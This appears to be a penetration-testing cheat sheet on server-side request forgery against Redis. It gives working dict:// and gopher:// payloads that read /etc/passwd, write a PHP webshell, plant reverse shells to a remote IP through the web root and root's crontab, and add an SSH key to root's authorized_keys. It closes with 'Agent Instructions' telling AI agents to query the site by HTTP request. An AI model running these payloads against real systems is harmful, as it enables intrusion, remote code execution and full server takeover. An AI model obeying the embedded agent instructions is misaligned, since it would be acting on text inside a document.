# SERVER SIDE REQUEST FORGERY (SSRF) PoC and enumeration ## It is possible to prove the vulnerability by reading local files ## Using the file protocol url=file:///etc/passwd ## Then you can enumerate local services that are listening ## Depending on the response : ## It is also possible to use others protocols like gopher and dict ## They don't send HTTP headers and can avoid misinterpretation gopher://127.0.0.1:6379/test ## Filter bypass instead of instead of or => 192.168.0.1 192.168.516 => 192.168.2.4 Redis Exploitation ## Redis is a database system that stores everything in RAM ## Getting a webshell url=dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/var/www/html url=dict://127.0.0.1:6379/CONFIG%20SET%20dbfilename%20file.php url=dict://127.0.0.1:6379/SET%20mykey%20"<\x3Fphp system($\_GET\[0])\x3F>" url=dict://127.0.0.1:6379/SAVE ## Getting a reverse shell gopher://127.0.0.1:6379/\_config%20set%20dir%20%2Fvar%2Fwww%2Fhtml gopher://127.0.0.1:6379/\_config%20set%20dbfilename%20reverse.php gopher://127.0.0.1:6379/\_set%20payload%20%22%3C%3Fphp%20shell\_exec%28%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FREMOTE\_IP%2FREMOTE\_PORT%200%3E%261%27%29%3B%3F%3E%22 gopher://127.0.0.1:6379/\_save nc -lvp ## Priv. Esc. using SSH key ssh-keygen url=dict://127.0.0.1:6379/SET%20mykey%20"\n\nCLE\_PUB\_RSA\_ICI\n\n" url=dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/root/.ssh url=dict://127.0.0.1:6379/CONFIG%20SET%20dbfilename%20authorized\_keys url=dict://127.0.0.1:6379/SAVE ssh -i id\_rsa ## You can use dict protocol and crontab ## - You set the working directory ## - Update the redis database location ## - Listening ## - Write a reverse shell payload ## - Save it dict ://127.0.0.1:6379/config set dir /var/spool/cron/ dict ://127.0.0.1:6379/config set dbfilename root nc -lvp dict ://127.0.0.1:6379/set -.- "\n\n\n\* \* \* \* \* bash -i >\x26 /dev/tcp/"ip"/"port" 0>\x261\n\n\n" dict ://127.0.0.1:6379/save ## You can also use the gopher protocol (replace IP and port) url=gopher%3A//127.0.0.1%3A6379/\_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252462%250D%250A%250A%250A%252A/ --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://morgan-bin-bash.gitbook.io/pentesting/server-side-request-forgery-ssrf.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.